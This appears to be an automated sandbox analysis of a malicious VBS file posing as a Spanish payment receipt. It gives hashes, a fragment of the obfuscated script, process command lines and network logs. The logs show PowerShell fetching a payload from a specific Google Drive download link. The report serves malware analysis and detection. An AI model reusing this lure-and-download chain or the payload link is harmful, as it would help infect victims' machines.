                              Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="kr92az2NxjKdxQ-wnrkiNQ">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                              File type:ASCII text, with very long lines (362), with CRLF line terminators
                              Entropy (8bit):5.341154719997299
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:JUSTIFICANTE DE PAGO.vbs
                              File size:8'029 bytes
                              MD5:98cded86c15d6f27d03e1ff9443cc0a2
                              SHA1:aa7e6cf10ace8891de39a6340b62b84f15d39a98
                              SHA256:a2793f248743616fac792f8d191c26c9d65f63ff1016820508cbda367b906e24
                              SHA512:f6a5e5270da61eb94effab98504db101cacf8f4f333df8785592a9396bb545dc9ce675012b27975ccdf3ad5356c07d315fc187a71420524646d86c314860d24d
                              SSDEEP:192:49zZJJnQdvyVpIB0dAGech7YP0RngYYt4S04FOo/IVJGJL5vOe5y9drEa:KmYuS08n8ds9h
                              TLSH:94F1197EFF1A09680A431BD07CECC801BF18AE7F14E198A1BD2C1378F149099875ADC9
                              File Content Preview:.. ..Function Pignorate ......Ma6 = Ma6 & "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(
                              Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:02:01.602437973 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.602524996 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:01.602617025 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.610771894 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.610810995 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:01.977930069 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:01.978013992 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.979017973 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:01.979073048 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.990643024 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:01.990660906 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:01.991035938 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:02.006874084 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:02.048110962 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:02.371623039 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:02.371814013 CEST | 443 | 49730 | 142.250.101.100 | 192.168.2.4
Apr 24, 2024 07:02:02.371885061 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:02.373832941 CEST | 49730 | 443 | 192.168.2.4 | 142.250.101.100
Apr 24, 2024 07:02:02.530298948 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.530338049 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:02.530550003 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.530981064 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.530991077 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:02.896086931 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:02.896349907 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.899142027 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.899147034 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:02.899476051 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:02.900669098 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:02.944129944 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.971719980 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.971833944 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:03.971846104 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.971915960 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.971965075 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:03.971971035 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.972140074 CEST | 443 | 49731 | 142.251.2.132 | 192.168.2.4
Apr 24, 2024 07:02:03.972196102 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Apr 24, 2024 07:02:03.973767042 CEST | 49731 | 443 | 192.168.2.4 | 142.251.2.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:02:01.441956997 CEST | 56329 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 07:02:01.595830917 CEST | 53 | 56329 | 1.1.1.1 | 192.168.2.4
Apr 24, 2024 07:02:02.375155926 CEST | 55568 | 53 | 192.168.2.4 | 1.1.1.1
Apr 24, 2024 07:02:02.529369116 CEST | 53 | 55568 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:02:01.441956997 CEST | 192.168.2.4 | 1.1.1.1 | 0x71ea | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:02.375155926 CEST | 192.168.2.4 | 1.1.1.1 | 0x4355 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.100 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.138 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.101 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.139 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.102 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:01.595830917 CEST | 1.1.1.1 | 192.168.2.4 | 0x71ea | No error (0) | drive.google.com | | 142.250.101.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:02:02.529369116 CEST | 1.1.1.1 | 192.168.2.4 | 0x4355 | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false
                              • drive.google.com
                              • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 142.250.101.100 | 443 | 7348 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:02:02 UTC | 215 | OUT | GET /uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Connection: Keep-Alive
2024-04-24 05:02:02 UTC | 1582 | IN | HTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:02:02 GMT
                              Location: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce-1fb7d8-NtmtkC2XIrXok0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.251.2.132 | 443 | 7348 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:02:02 UTC | 233 | OUT | GET /download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
2024-04-24 05:02:03 UTC | 2120 | IN | HTTP/1.1 200 OK
                              X-GUploader-UploadID: ABPtcPoOhizefBrlhSOg-5nqYyDjQlXi5ryv-SPhIsPmWtXKpUOTF8vJQ5mGfwZtUhwR6e-8bQ
                              Content-Type: text/html; charset=utf-8
                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:02:03 GMT
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce--ln7oSX7E5RvjqwKZzogTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Resource-Policy: same-site
                              reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0pBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiH4_SSRRvZBE7smTyRGQAHMxUJ"
                              Content-Length: 1692
                              Server: UploadServer
                              Set-Cookie: NID=513=HmcfVWYW2TJEEffq4Sr_uBNFvxa6A1CT9SsMLRCuaZuQaOz1vb-UvrF8BH2IniAKXWS3WAWizcUHHYYV36nWQiS7ARPjDJoHmLx5WVTBWT7W7vLwnMYuFBAT38ATp3m-XaWFWTr2ClXXG683fI0_eueyXx4jecMSlp1e3Uiii74; expires=Thu, 24-Oct-2024 05:02:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Content-Security-Policy: sandbox allow-scripts
                              Connection: close
2024-04-24 05:02:03 UTC | 1692 | IN | Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="kr92az2NxjKdxQ-wnrkiNQ">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor



                              Target ID:0
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
                              Imagebase:0x7ff7a17d0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:1
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated inline PowerShell script, removed>"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:07:01:57
                              Start date:24/04/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:07:02:00
                              Start date:24/04/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"
                              Imagebase:0x7ff6e97b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f171ca1d00b68ae0acceade6176f8c3d95abfacf649c8921ef672f0e0136c2e
                                • Instruction ID: 91e6415ed91101f7aafd95e2dc7e52af6cdf1bf5caaf89f285e918e91e347fcf
                                • Opcode Fuzzy Hash: 7f171ca1d00b68ae0acceade6176f8c3d95abfacf649c8921ef672f0e0136c2e
                                • Instruction Fuzzy Hash: 28E16831B1FA9E1FEBA5DBAD48795B57BE2EF55214B1901FAD05DC70E3CA28AC018301
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 687c605b191bc9e9b5ff6078ce38598d2d8ab68999a1131769fc9346082d9605
                                • Instruction ID: 375e5dc8311945e6bc6b42eaa76ae121a091b353efcd663c657d69765c285270
                                • Opcode Fuzzy Hash: 687c605b191bc9e9b5ff6078ce38598d2d8ab68999a1131769fc9346082d9605
                                • Instruction Fuzzy Hash: ADD16631B1EA9D1FE7B9EBA848656B97BA2EF41310F0900FED05CC71E3DD18A8058341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000001.00000002.1827463692.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 14e859375cf68c39959bac356ab10d1bd63f58a652f1a2f5bada4b35771070a8
                                • Instruction ID: 381fdcac2406e883365e726638cacf81ef44c1e51794a75011045352c3f1b11a
                                • Opcode Fuzzy Hash: 14e859375cf68c39959bac356ab10d1bd63f58a652f1a2f5bada4b35771070a8
                                • Instruction Fuzzy Hash: 72512232F2FADE1FE7A5DBAD08791B56BD2AF55254B5A00BAD05CC71E3DD28AC408301
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000001.00000002.1827100125.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                • Instruction ID: eb7a46cdb0012eff6e5c38bb0d8d527c599f3350d087005d384069ff07837e75
                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                • Instruction Fuzzy Hash: FD01A73020CB0C4FD748EF0CE451AA5B3E0FB89324F10056DE58AC36A1D632E882CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1827100125.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7ffd9b870000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: O_^$O_^$O_^$O_^$O_^
                                • API String ID: 0-2660881393
                                • Opcode ID: 12f438d09a6740beeb2fa742dd70f367b9a47cce233cf849700d508212fd7915
                                • Instruction ID: ddad29041beb889f918e4b23d9e8e66925d0aeded4c926a2ab593cb5facc51bb
                                • Opcode Fuzzy Hash: 12f438d09a6740beeb2fa742dd70f367b9a47cce233cf849700d508212fd7915
                                • Instruction Fuzzy Hash: FC31CA63E1FAD65FE662876B88BD0902BA0FF5675970A41F7C0EF4B193EC153A074202
                                Uniqueness

                                Uniqueness Score: -1.00%